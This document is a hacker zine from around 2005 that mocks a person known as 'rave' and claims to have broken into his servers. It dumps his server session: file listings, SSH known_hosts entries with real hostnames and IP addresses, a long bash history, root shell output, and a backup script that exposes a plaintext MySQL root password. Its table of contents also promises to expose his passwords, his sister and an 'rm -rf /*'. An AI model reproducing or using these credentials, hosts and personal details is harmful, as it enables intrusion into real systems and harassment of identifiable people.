_______ _______ _______ _________ _______ _ _ _______ ( ____ )( ___ )( ____ \\__ __/( ____ \( \ ( \ ( ___ ) | ( )|| ( ) || ( \/ ) ( | ( \/| ( | ( | ( ) | | (____)|| | | || (_____ | | | (__ | | | | | | | | | __)| | | |(_____ ) | | | __) | | | | | | | | | (\ ( | | | | ) | | | | ( | | | | | | | | | ) \ \__| (___) |/\____) |___) (___| (____/\| (____/\| (____/\| (___) | |/ \__/(_______)\_______)\_______/(_______/(_______/(_______/(_______).net ------------------------------------------------- J O H N N Y M A S T (U R B A T E) aka rave ------------------------------------------------- G E T S _______ _ _______ ______ ( ___ )|\ /|( ( /|( ____ \( __ \ | ( ) || ) ( || \ ( || ( \/| ( \ ) | | | || | _ | || \ | || (__ | | ) | | | | || |( )| || (\ \) || __) | | | | | | | || || || || | \ || ( | | ) | | (___) || () () || ) \ || (____/\| (__/ ) (_______)(_______)|/ )_)(_______/(______/ A N D _______ _______ _______ _______ _______ ______ ( ____ \|\ /|( ____ )( ___ )( ____ \( ____ \( __ \ | ( \/( \ / )| ( )|| ( ) || ( \/| ( \/| ( \ ) | (__ \ (_) / | (____)|| | | || (_____ | (__ | | ) | | __) ) _ ( | _____)| | | |(_____ )| __) | | | | | ( / ( ) \ | ( | | | | ) || ( | | ) | | (____/\( / \ )| ) | (___) |/\____) || (____/\| (__/ ) (_______/|/ \||/ (_______)\_______)(_______/(______/ 21:28 <@rave> im writing README.ssl 21:30 <@rave> why ?. Because we take security as a serieuse thing ################################################################### [1] rave info [2] www.rosiello.net owned & exposed [3] laptop.localdomain (192.168.0.6) owned & exposed [4] localhost.localdomain (192.168.0.10) owned & exposed [5] www.xdevteam.net owned & exposed [6] irc.rosiello.net unrealircd.conf exposed [7] eftpd gets alittle modded [8] rave's master plans to own dikline exposed [9] rave's 1337 tips to Internet hacking exposed [10] rave's 1337 passwords exposed [11] rave's sister gets owned & exposed [12] the rm -rf /* [13] Conclusion ################################################################### [1] rave info saved for n0tm3 [2] www.rosiello.net owned & exposed sh-3.00$ ssh rave@rosiello.net Password: Last login: Thu Aug 18 17:37:24 2005 from 192.168.0.10 rave@debian:~$ uname -a; id Linux debian.rosiello.net 2.4.27-2-386 #1 Thu Jan 20 10:55:08 JST 2005 i686 GNU/Linux uid=1000(rave) gid=1000(rave) groups=1000(rave),1001(cvsgroup),1007(cvsuser) rave@debian:~$ ls -la total 269092 drwxr-xr-x 31 rave rave 4096 Aug 17 22:40 . drwxrwsr-x 13 root staff 4096 Aug 10 19:21 .. drwx------ 2 rave rave 4096 Aug 15 21:10 .AbiSuite lrwxrwxrwx 1 rave rave 45 Jul 1 16:47 .DCOPserver_debian.rosiello.net_:0 -> /home/rave/.DCOPserver_debian.rosiello.net__0 -rw-r--r-- 1 rave rave 66 Jul 1 16:47 .DCOPserver_debian.rosiello.net__0 -rw------- 1 rave rave 1174 Jul 1 16:47 .ICEauthority -rw------- 1 rave rave 64 Jul 1 16:47 .Xauthority -rw------- 1 rave rave 6294 Aug 14 12:51 .bash_history -rw-r--r-- 1 rave rave 704 Apr 23 22:18 .bash_profile -rw-r--r-- 1 rave rave 1290 Apr 23 22:18 .bashrc -rw------- 1 rave rave 22 Apr 25 00:46 .dmrc drwxr-xr-x 3 rave rave 4096 Apr 25 00:41 .evolution -rw-r--r-- 1 rave rave 563794 Aug 17 22:40 .fonts.cache-1 drwx------ 4 rave rave 4096 Aug 17 23:43 .gaim drwx------ 4 rave rave 4096 Jul 1 14:09 .gconf drwx------ 2 rave rave 4096 Aug 15 21:10 .gconfd -rw-r----- 1 rave rave 0 Jul 1 14:06 .gksu.lock drwx------ 3 rave rave 4096 Apr 23 23:50 .gnome drwx------ 9 rave rave 4096 Jul 1 14:15 .gnome2 drwx------ 2 rave rave 4096 Apr 23 23:50 .gnome2_private drwxr-xr-x 3 rave rave 4096 May 16 22:34 .gnupg drwxr-xr-x 2 rave rave 4096 Apr 23 23:50 .gstreamer-0.8 -rw-r--r-- 1 rave rave 86 Apr 23 23:50 .gtkrc-1.2-gnome2 drwx------ 4 rave rave 4096 May 16 21:16 .kde drwxr-xr-x 3 rave rave 4096 Apr 25 00:48 .mcop -rw------- 1 rave rave 31 Jul 1 13:01 .mcoprc drwx------ 3 rave rave 4096 Apr 23 23:50 .metacity drwx------ 3 rave rave 4096 Apr 23 23:52 .mozilla -rw------- 1 rave rave 36 Aug 2 22:13 .nano_history drwxr-xr-x 3 rave rave 4096 Apr 23 23:50 .nautilus drwxr-xr-x 2 rave rave 4096 Jul 12 20:59 .qt -rw------- 1 rave rave 0 Apr 23 23:50 .recently-used drwx------ 2 rave rave 4096 May 5 18:54 .ssh drwx------ 4 rave rave 4096 Aug 2 23:30 .thumbnails -rw------- 1 rave rave 609 Aug 2 22:18 .viminfo drwx------ 3 rave rave 4096 Jul 1 13:05 .xchat2 drwxr-xr-x 4 rave rave 4096 Apr 23 23:52 .xmms -rw-r--r-- 1 rave rave 200124 Jul 25 20:39 .xsession-errors -rw-r--r-- 1 rave rave 7920 Jun 16 22:18 1077606958.gif drwxr-xr-x 3 rave rave 4096 Aug 2 23:18 Desktop drwx------ 7 rave rave 4096 May 11 21:23 Mail drwxr-xr-x 2 rave rave 4096 May 17 01:37 bin drwxr-xr-x 29 rave rave 4096 Jul 21 21:43 bk drwxr-xr-x 3 root root 4096 Aug 17 22:29 cmds drwxr-xr-x 7 root root 4096 Jun 30 11:16 cvsroot -rw-r--r-- 1 rave rave 174 Aug 14 12:51 dr.c drwxrwxrwx 2 root root 4096 Jul 3 01:36 edge drwxr-xr-x 4 root root 4096 Aug 17 22:34 extra drwxr-xr-x 10 rave rave 4096 Aug 14 12:36 extreme -rw-r--r-- 1 rave rave 74 May 16 22:22 gpg-agent-info -rw------- 1 rave rave 13449 May 17 19:10 mbox -rw-r--r-- 1 rave rave 96 May 16 22:33 text.gpg -rw-r--r-- 1 rave rave 274280544 Aug 6 15:14 ubuntu-5.04-install-i386.iso -rwxr-xr-x 1 rave rave 32 May 17 01:34 vuln.sh rave@debian:~$ ls 1077606958.gif Desktop Mail bin bk cmds cvsroot dr.c edge extra extreme gpg-agent-info mbox text.gpg ubuntu-5.04-install-i386.iso vuln.sh rave@debian:~$ cat vuln.sh #!/bin/sh /bin/echo hello world rave@debian:~$ cat dr.c #define MODULE #include int init_module(void) { printk("<1>Hello, world\n"); return 0; } void cleanup_module(void) { printk("<1>Goodbye cruel world\n"); } rave@debian:~$ ls * 1077606958.gif dr.c gpg-agent-info mbox text.gpg ubuntu-5.04-install-i386.iso vuln.sh Desktop: Install_DinerDash.EXE Stef Bos - Papa (2).mp3 Trash install_flash_player_7_linux.tar.gz nieuw Mail: drafts inbox outbox sent-mail trash bin: echo bk: Desktop Templates VIDEO_TS boot extreme cmds: Attic cvsroot: CVSROOT anIRCD extreme jatx rpf edge: log extra: ftppasswd ftpwho extreme: AUTHORS CVS INSTALL Makefile.cvs README TODO aclocal.m4 conf config.h.in config.status configure.in install-sh ltmain.sh mkinstalldirs src COPYING ChangeLog Makefile Makefile.in README_TEAM TODO~ aclocal.m4.save config.guess config.h.in~ config.sub depcomp la.c man modules stamp-h COPYRIGHTS Doxyfile Makefile.am NEWS TEAM Working autom4te.cache config.h config.log configure extreme2-0.1 la.c.save missing scripts stamp-h.in rave@debian:~$ cat .ssh/known_hosts 192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= war.swehack.se,213.80.38.17 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0c4J26RarVFEXwqio2Fvs3smJgMgWgTdXzoNVwhuB4bU6ebdI/54VGYPObuq5cBT/PFmj1Scf7Vtc7isGKtMHX+4Eo+jrwxJJ6RkGaWcAZd2h9IUOit8uPDT1oC3j65MZZZnj4dAnJDABBogNde/i6pJcStLbWoJ4Dnohy2ZEXE= rootme.dyndns.org,67.81.132.213 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3LaOcKJ9YLpk2lqf/k/oCN4OtynJcD1tKyNrhxnX9B8CKUeNd7PO+W+U9oOBCSUC264AO+O/9i3F9tBT7cJMi0kLBe8FLZ6yhhypd0d+EvIo78MLH7u4fyfX/x62dXwi6/sBbEYZ8WbttcEwSBgUcIhmKoYMImSDIQgfbhre8CU= 192.168.0.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA88Z9pfSKt85oZH/al9fNi6mM5c0Tx/3pyoycZ2ddqhwdtovOorBwSBUbHoiEuTivj8DAUs5Tj60Tl3eEMUvWEZdFwXreJBfQk1GmM7Po1fH3G943xo74YperveHNDbTxEIMbHGxw42dHzdOJe5enEHr/1n8T5H19jKqOs8pWCfc= rootwar.rosiello.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3LaOcKJ9YLpk2lqf/k/oCN4OtynJcD1tKyNrhxnX9B8CKUeNd7PO+W+U9oOBCSUC264AO+O/9i3F9tBT7cJMi0kLBe8FLZ6yhhypd0d+EvIo78MLH7u4fyfX/x62dXwi6/sBbEYZ8WbttcEwSBgUcIhmKoYMImSDIQgfbhre8CU= cf.sf.net,12.152.184.18 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw/C6cdKfYKKKBzTu31JDhxrwXURZL/gddfCOm7zJ3Mtxs6KEhLkGoXyhVvdS9wYhJKAQvVXcRhL0EsmkaEmRGiIcoWiYEd34uxKuRFmUlXl8L9r0R2Rn0HDTaEFUnGmwbHx1fsofZL4yjCkhJ67puJt5nFyTEtXfHnezwdDaqeU= 192.168.0.06 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw9yp5U83EGtwqLclFxRLLuJYdQzWDQi2pag5CXDHwAFyhycGrv4ebLg5YRfriqVo1oXZ6FDkF82k5MTdSK4ZSjoL9EeTLPFNkdmnA04wvpUZo5AneklofNOQTdYXqYbFJ3/9uZMBzotqRHwwJ5b7wudFeVMwjEVqOd7wlD4346k= rave@debian:~$ cat .bash_history mail mail -f hostname mail mail hostname exit mail finger rave exit mail mail exit mail /sbin/ifconfig exit mail mail -r mail -f exit mail mail mail ssh niki@www.xsol.biz nslookup ms.rosiello.net nslookup mx.rosiello.net nslookup mx.rosiello.net /sbin/ifconfig nslookup mx.rosiello.net nslookup mx.rosiello.net --help nslookup 212.127.146.168 nslookup nslookup mx.rosiello.net @212.127.146.168 nslookup mx.rosiello.net @62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 nslookup mx.rosiello.net 62.149.128.2 ifconfig /sbin/ifconfig ls cd /etc ls export set su mail mail nslookup www.rosiello.net exit mail mail mail mail finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave finger rave hostname /sbin/ifconfig exit ls gpg --help gpg --verify text.pgp ls gpg --verify text.gpg ls gpg --decrypt text.gpg ls exit mail exit exit mail mail mail finger rave pwd pico vuln.sh chmod a+x vuln.sh ./vuln.sh export PATH=./:$PATH export IFS="/: export IFS="/" ./vuln.sh ./vuln.sh ls ./vuln.sh export IFS=/ ./vuln.sh ls strace vuln.sh pico bin chmod a+x bin ./vuln.sh export IFS=\ export IFS=\\ ./vuln.sh export IFS=/ ./vulnsh ./vuln.sh mkdir bin cp bin echo ls ./vuln.sh mkdir bin rm bin mkdir bin cd bin cp ../echo ./ cd .. ./vuln.sh cat vuln.sh echo $PATH echo $PATH sh -c vuln.sh cat vuln.sh export IFS=\ export IFS=// echo $PATH export IFS=/ echo $PATH echo $PATH nslookup mx.rosiello.net exit mail mail exit mail finger rave exit mail exit mail mail mail export dmomain hostname /sbin/ifconfig telnet mx.rosiello.net 25 ssh rave@war.swehack.se mail exit ls exit CVSROOT=:ext:cvsuser@192.168.0.2:/cvsroot export CVS_RSH pwd ls cvs export extreme CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs export extreme export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs export extreme cvs export extreme cvs export extreme cvs help cvs export extreme cvs help export cvs export help cvs checkout extreme ls cd extreme ./configure make cd src ls ./eftpd -P la ls ./rftpd ls exit cd extreme cvs update extreme cvs export extreme cvs update extreme export export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs update extreme export CVS_RSH export CVS_RSH=ssh export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs update extreme cvs update extreme export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" exit cd extreme export CVSROOT=":ext:cvsuser@192.168.0.2:/cvsroot" cvs update ls ./configure make ls id /sbin/ifconfig exit su /sbin/ifconfig su su dmesg | grep zip dmesg lspci lspci | grep zip lspci | grep io lspci | grep iom dmesg | grep iom dmesg cd /media ls df ls df u su exit cd /etc/hackuppc cd /etc/backuppc ls cat htpasswd htpasswd htpasswd ./htpasswd admin cat htpasswd su exit ls ls -l cd cvsroot ls cd .. ls pwd exit passwd passwd ssh kevin@rootme.dyndns.org ftp ftp ifconfig exit cd /var/www/egde cd /var/www/edge ls cd *2005* ls ls cd include ls cat link its tooooo damn hot outside :( hypnosses haha hypnosses and all those bears that live outthere ls cat edge.header.php cd .. cat config.php ls cat user.php cd site pico include/config.php ls -l su exit cd /var/www/edge/*2005* ls cd site ls pico index.php su cd bk ls ls cd boot ls cd .. exit cd bk ls scp .xchat2 rave@192.168.0.6:~ scp -r .xchat2 rave@192.168.0.6:~ ls -an scp -r .evolution rave@192.168.0.6:~ ls -an | more scp -r .gnupg rave@192.168.0.6:~ cd .gnupg ls ls -l ls ls ls -l mv gpg-agent-info gpg-agent-info.bk exit cd bk scp -r extreme rave@192.168.0.6:~ exit cd bk ls cd Desktop ls cd .. ls -an su cd bk ls cd Desktop ls scp -r aap rave@192.168.0.6:~/Desktop/ cat > la su exit cd bk ls cd Desktop ls cd Downloads ls ls | *.mp3 ls *.mp3 ls *bad ls *Bad* ls ssh kevin@rootwar.rosiello.net ssh ravecool@cf.sf.net <--- Oh yes! he is sooo coool exit cd bl cd bk ls -lan | more ls -lan | more scp -r .gnupg rave@192.168.0.06:~ scp -r extreme rave@192.168.0.06:~ scp -r .xchat2 rave@192.168.0.06:~ su w ps aux ps aux su pico transfer.c cd extreme2 cd extreme cd src pico transfer.c make man fnctl man fcntl pico transfer.c make pico transfer.c make pico transfer.c pico transfer.c make pico transfer.c pico transfer.c make make clean make scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c scp transfer.c root@192.168.0.2:/var/www/transfer.c.txt pico transfer.c cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c cat CVS/Root ls pico CVS/Root cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c cd CVS ls pico Respository pico Repository pico Entries cd .. cvs commit -m "Added: Added ABOR + ext_sendfile to the system" transfer.c pico CVS/Entries cvs commit pico CVS/Entries cd CVS mv Entries Entries.bk cd .. mv Entries Entries.bk cvs commit cd CVS touch Entries cd .. cvs commit cvs commit ls ls cd .. cvs update pico CVS/Root cvs update ls cd conf ls pico CVS/Root cvs update ls cd .. ls cd src ls cd extra sl; ls pico CVS/Root cvs update l ls cd ftppasswd ls pico CVS/Root ls cvs update ls cd ../ftpwho pico CVS/Root cvs update cd .. cd .. ls ls rm Makefile.FreeBSD ls rm Makefile.Linux ls exit ls ftp exit cd extreme/src ./eftpd -P la ls pwd ./eftpd -P la uname -a exit su- su - ls ls cat echo rm echp rm echo cd extreme/src make cd /tmp pico dr.c gcc -o dr.c gcc -o dr dr.c pico dr.c gcc -o dr dr.c -I/lib/modules/`uname -r`/include/ ls/lib/modules/`uname -r`/include/ ls /lib/modules/`uname -r`/include/ ls /lib/modules/`uname -r`/ ls /lib/modules/`uname -r`/kernel ls /usr/src/`uname -r`/ ls /usr/src/ ls /usr/src/ uname -a ls /usr/src ls /usr/src gcc -c bk.c ls gcc -c dr.c ls /usr/src ls ls /lib/ ls /lib/modules/`uname -r` ls /lib/modules/`uname -r`/kernel ls /lib/modules/`uname -r`/kernel/arch ls /lib/modules/`uname -r`/kernel/arch/*/ ls /lib/modules/`uname -r`/kernel/arch/*/* ls cd /usr/src ls ls -an pwd cd .. ls cd /usr/src/kernel-headers-2.4.27-2 ls /usr/src make cd /tmp gcc -c dr.c cp dr.c ~ rave@debian:~$ su - Password: debian:~# id uid=0(root) gid=0(root) groups=0(root) debian:~# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1492 464 ? S Jul01 0:02 init [2] root 2 0.0 0.0 0 0 ? S Jul01 0:05 [keventd] root 3 0.0 0.0 0 0 ? SN Jul01 0:01 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? S Jul01 1:11 [kswapd] root 5 0.0 0.0 0 0 ? S Jul01 0:00 [bdflush] root 6 0.0 0.0 0 0 ? S Jul01 0:00 [kupdated] root 105 0.0 0.0 0 0 ? S Jul01 1:21 [kjournald] root 389 0.0 0.1 1476 384 ? Sla.php pico la.php df exit cd /etc ls | grep pure cd pure-ftpd ls cd conf ls cd .. cd .. ls | grep ftp cd pure-ftpd ls cd conf ls pico MinUID ls updatedb ls locate ftpd.conf locate ftpd.conf | grep pure locate .conf | grep pure ls ls pico AltLog ls pico MinUID ls cd .. ls cd auth ls pwd ls pure-ftpd --help pure-ftpd --help | grep active pure-ftpd --help | more pure-ftpd --tls killall pure-ftpd ps aux ps aux | grep ftp killall inetd pure-ftpd --tls ls ls pwd ls cd .. ls cd dn cd db ls cd .. ls ls -l pico http://koti.mbnet.fi/lordscav/demogal/ pico pureftpd-dir-aliases ifconfig exit cd /var/www/edge/*2006 cd /var/www/edge/*2005 ls ls | grep th pico theme.conf.php exit cd /var/www/manual ls cd .. cd dc ls scp -r manual rave@192.168.0.2:~/Desktop/ scp -r manual rave@192.168.0.6:~/Desktop/ ls exit df df -a ls /mnt/media ls ls /media/zip ls -l /media/zip ls -l /media/zip cd /var/www/edge/*2005 ls ls *the* ls *theme* pico theme.conf.php cd imgsystem ls cp logo.gif logo.kids.gif wget http://www.rosiello.net/mainsite/uploads/orig00000082.jpg mv http://www.rosiello.net/mainsite/uploads/orig00000082.jpg logo.gif mv orig00000082.jpg logo.gif df /media/zip cd /media/zip ls stat Backup.2005-08-08 cd Backup.2005-08-08 ls size * stat * cd /var/www ls ls cd my.org cd module ls cd .. ls cd downloads ls cd .. ls cd zoper ls cd /tmp wget http://ovh.dl.sourceforge.net/sourceforge/wikipedia/mediawiki-1.4.7.tar.gz gunzip mediawiki-1.4.7.tar.gz tar fvx mediawiki-1.4.7.tar cd mediawiki-1.4.7 ls cd .. cp -r mediawiki-1.4.7 /var/www/wiki cd /var/www/wiki chmod a+w config locate php.ini pico /etc/php4/apache2/php.ini /etc/init.d/apache restart /etc/init.d/apache2 restart pico /etc/php4/apache2/php.ini pico /etc/php4/apache2/php.ini /etc/init.d/apache2 restart pico /etc/php4/apache2/php.ini /etc/init.d/apache2 restart cat /etc/cron.daily/run mv config/LocalSettings.php ./ l ls pico * angelo has quit () nanonyme rave: since the shell no longer uses ipv6, i changed back to your server :) pico LocalSettings.php ls -l | grep images chmod 777 images pico LocalSettings.php ls cd ../ cd extreme ls rm * ls rm -r * ls exit cd /Unreal* ls pico unrealircd.conf whois irc.rosiello.net nslookup irc.rosiello.net pico unrealircd.conf exit cd /Unreal* ls pico unrealircd.conf pico unrealircd.conf exit cd /Unreal* ls useradd top passwd top pico /etc/passwd exit pico /etc/passwd adduser cold passwd cold ls ~cold ls /home ls -l /home pico /etc/group id cold w w apt-get propertys openssl w exit ssh rave@192.168.0.6 ssh root@216.194.56.245 exit cd /cvsroot/jatx ls ls -l cat passwd ls -l ../extreme chown rave.cvsuser * cd .. chown rave.cvsuser * chown rave.cvsuser headers/* chown rave.cvsuser jatx/headers/* ls apt-get install bind9 apt-get install webmin-bind9 apt-get install webmin-bind ps aux ps aux | grep mini cd /etc/init.d ls ./webmin ./webmin start netstat -anp | grep mini netstat -anp | grep serv netstat -anp | grep web netstat -anp | grep 10 netstat -anp | grep 100 cd /etc/webmin ls pico miniserv.conf /etc/init.d/webmin start /etc/init.d/webmin restart pico miniserv.conf /etc/init.d/webmin restart pico miniserv.conf /etc/init.d/webmin stop /etc/init.d/webmin start killlall miniserv ps aux | grep mini kill -9 1745 ps aux | grep mini /etc/init.d/webmin start pico miniserv.conf /etc/init.d/webmin restart ls -l /usr/share/webmin/bind/index.cgi ls -l /usr/share/webmin/bind/index.cgi chmod 777 /usr/share/webmin/bind/index.cgi pico /usr/share/webmin/bind/index.cgi pico /usr/share/webmin/bind/index.cgi ls cd .. ls pwd apt-get install bind9 apt-get install webmin-bind9 apt-get remove webmin-bind apt-get install webmin-bind pwd apt-get search apt-get list apt-get --help apt-get -u apt-get -u cd /etc/named ls cd /etc/bind ls pico named.conf ls pico db.local pico named.conf pico "/etc/bin/db.alpha" ls pico db.0 pico "/etc/bin/db.alpha" ls clear ls pico zones.rfc1918 ls pico db.empty pico named.conf /etc/init.d/named restart /etc/init.d/bind restart /etc/init.d/bind9 restart ping alpha.rosiello.net pico named.conf ls pico "/etc/bin/db.alpha" pwd pico /etc/bind/db.alpha pico named.conf pico /etc/bind/db.alpha /etc/init.d/bind9 restart ping alpha.rosiello.net nslookup alpha.rosiello.net @localhost nslookup alpha.rosiello.net @127.0.0.1 nslookup alpha.rosiello.net 127.0.0.1 dig alpha.rosiello.net 127.0.0.1 dig alpha.rosiello.net @127.0.0.1 dmesg tail /var/log/syslog pico /etc/bind/db.alpha /etc/init.d/bind9 restart clear dig alpha.rosiello.net @127.0.0.1 tail /var/log/syslog dig alpha dig alpha @localhost pico /etc/bind/db.alpha /etc/init.d/bind9 restart dig alpha @localhost ping alpha ping alpha.rosiello.net ping alpha.rosiello.net pico /etc/bind/db.alpha /etc/init.d/bind9 restart ping alpha.rosiello.net dig alpha @localhost ping alpha pico /etc/resolv pico /etc/resolv.conf ping alpha clear nslookup alpha dig alpha debian:/etc/bind# dig alpha ; <<>> DiG 9.2.4 <<>> alpha ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10755 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;alpha. IN A ;; ANSWER SECTION: alpha. 604800 IN A 192.168.0.7 ;; AUTHORITY SECTION: alpha. 604800 IN NS alpha.rosiello.net. ;; Query time: 2 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Sat Aug 13 14:16:56 2005 ;; MSG SIZE rcvd: 71 debian:/etc/bind# dig rosiello.net ping alpha ls pico /etc/apache/apache.conf pico /etc/apache/apache2.conf pico /etc/apache2/apache2.conf cd /etc/apache2/ ls pico httpd.conf cd sites-available ls pico alpha cp befault aplha cp default aplha pico alpha cp default alpha rm aplha pico alpha ssh 192.168.0.7 ssh 192.168.0.8 ssh 192.168.0.7 ssh 192.168.0.6 ssh alpha ssh alpha /etc/init.d/apache2 restart ssh alpha ssh 192.168.0.9 ssh 192.168.0.8 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.7 ssh 192.168.0.9 ls cd /etc/namned cd /etc/bind ls pico db.alpha /etc/init.d/bind restart /etc/init.d/bind9 restart ping alpha ssh alpha ping alpha cd /var/log cd apache cd httpd ls cd apache2 ls tail error_log cd /var/www/apache2 cd /etc/apache2 ls cd site-a* ls cd sites-a* ssh alpha /etc/init.d/apache2 restart cd /var/log/apache2 tail error_log ls tail error.log tail error.log tail error.log | grep alp ls tail access.log | grep alp cat access.log | grep alpa cat * | grep alpha.rosiello.net ls cd /etc/init.d ls cd /etc/apache2 ls cd sites-en cd sites-en* ls pico 000-default cd ../sites-a* ls pico alpha /etc/init.d/apache2 /etc/init.d/apache2 restart tail /var/log/apache2/error_log tail /var/log/apache2/error.log cd .. ls pico apache2.conf pico httpd.conf ls ps aux ifconfig dpkg-reconfigure xserver-xfree ssh alpha exit apt-get install webmin-apache e16 enlichtanet enlightamet enlightament enlightenment enlightenment cd /home/infobot ls cd * ls cd conf ls pico infobot.config ps aux ps aux | grep infobot kill 30084 nohub ./infobot & nohup ./infobot & ls ls infobot ls infobot* cd .. nohup ./infobot & pico conf/infobot.conf pico config/infobot.conf cd conf pico infobot.config nohup ./infobot & cd .. killall infobot nohup ./infobot & pico config/infobot.config cd conf pico infobot.config killall infobot cd .. nohup ./infobot & exit ping 192.168.0.10 cd /etc/named cd /etc/bind ls pico db.alpha /etc/init.d/bind restart /etc/init.d/bind9 restart lynx alpha.rosiello.net exit cd ~infobot/*/config cd ~infobot/*/conf pico infobot.config killall infobot nohup ./infobot & cd .. nohup ./infobot & exit cd /var/www pico compile.txt exit cd /cvsroot ls cd extreme ls cd src ls ls cmds ls cmds/Attic cp -r cmds ~rave rm -r cmds cp -r extra ~rave rm -r extra exit debian:~# cat .ssh/known_hosts 192.168.0.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw9yp5U83EGtwqLclFxRLLuJYdQzWDQi2pag5CXDHwAFyhycGrv4ebLg5YRfriqVo1oXZ6FDkF82k5MTdSK4ZSjoL9EeTLPFNkdmnA04wvpUZo5AneklofNOQTdYXqYbFJ3/9uZMBzotqRHwwJ5b7wudFeVMwjEVqOd7wlD4346k= 192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= 216.194.56.245 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6drFR2juh7xY5FVMlo/YLILANlhT+ViLZbdLGgOYegzAaEF8s3GS76o46CRewYmcve/lLWd+XTWNjU3cMYLjzM8vzjqCA6qCN7o9xVBXJuySKfbF85G+leeAPeflfiRNEbR6FKBUym4bF5+8O+oHr1dB+WwoZcTyl2bf2v6X7O0= 192.168.0.9 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuVJfv6i/QvPVq0P4tFwTVeam2ihk8P1UVbnYLJglxI+BBckk3t9M7M+IU/Mqx+OQSjx+SEsqwuwKL/3BsisKx/COKsijBD8gpHFmYrY2oaQsx1uodQj1sJWbHYUv8eHOFK9yK9/8PX3GKaLaiAl1+KPHfNANLne5UEvPE3GOS5s= alpha ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuVJfv6i/QvPVq0P4tFwTVeam2ihk8P1UVbnYLJglxI+BBckk3t9M7M+IU/Mqx+OQSjx+SEsqwuwKL/3BsisKx/COKsijBD8gpHFmYrY2oaQsx1uodQj1sJWbHYUv8eHOFK9yK9/8PX3GKaLaiAl1+KPHfNANLne5UEvPE3GOS5s= 212.127.146.168 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= 192.168.0.10 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuVJfv6i/QvPVq0P4tFwTVeam2ihk8P1UVbnYLJglxI+BBckk3t9M7M+IU/Mqx+OQSjx+SEsqwuwKL/3BsisKx/COKsijBD8gpHFmYrY2oaQsx1uodQj1sJWbHYUv8eHOFK9yK9/8PX3GKaLaiAl1+KPHfNANLne5UEvPE3GOS5s= debian:~# cat run.sh #!/bin/sh SRC="/home/rave/extreme/" TARGET="/media/zip/" TARGET2="/root/backup/" TAR="/bin/tar" DATUM=`date --iso-8601=date` DB="template" DBUSER="root" DBPASS="st4lk3rs" MYSQL="/usr/bin/mysqldump" FILE="Backup.$DATUM" echo $TARGET$FILE echo $TARGET2$FILE cd /tmp $TAR -zvcf $FILE.tar.gz $SRC $MYSQL $DB --user=$DBUSER --password=$BDPASSWD > $FILE.sql mkdir $TARGET$FILE mkdir $TARGET2$FILE cp $FILE.tar.gz $TARGET$FILE 2> /dev/null cp $FILE.tar.gz $TARGET2$FILE 2> /dev/null cp $FILE.sql $TARGET$FILE 2> /dev/null cp $FILE.sql $TARGET2$FILE 2> /dev/null echo "$FILE.tar.gz Created in $TARGET$FILE and $TARGET2$FILE" 